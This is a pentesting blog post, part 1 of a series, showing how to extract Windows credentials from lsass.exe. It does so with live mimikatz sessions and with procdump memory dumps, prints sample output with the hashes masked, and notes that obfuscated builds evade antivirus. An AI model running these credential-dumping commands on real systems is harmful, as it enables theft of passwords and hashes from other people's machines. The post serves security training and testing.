danielsauder

IT security is a matter of trust.

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple. Dump the lsass.exe process and use mimikatz for getting the credentials as clear text and the hashes. You need admin or system rights for this.
But as a short reminder first let’s have a look at the “normal” way for dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege ’20’ OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self compiled or otherwise obfuscated mimikatz version every antivirus scanner will do its work. But it is also possible to read credentials from memory dump.
Make memory dump with Process explorer:
prxp624447fe299fa27348bebd7a23b30eb
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have access over a shell.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : ‘e:\lsass.dmp’
mimikatz # sekurlsa::logonPasswords
Opening : ‘e:\lsass.dmp’ file for minidump…
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
Overview:
https://govolution.wordpress.com/2016/02/06/memdumps-volatility-mimikatz-vms-overview/
Links:
https://github.com/gentilkiwi/mimikatz
https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
https://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html

Published by

Daniel

One response to “Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump”

  1. Memdumps, Volatility, Mimikatz, VMs – Overview | govolution

    […] have a look at countermeasures in a later part (whereby I mean monitoring and logging). Overview Part 1: Mimikatz & lsass.exe Dump Part 2: Windows 7 Full Memory Dump & Get Hashes Part 3: WinDBG Mimikatz Extension Part […]

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: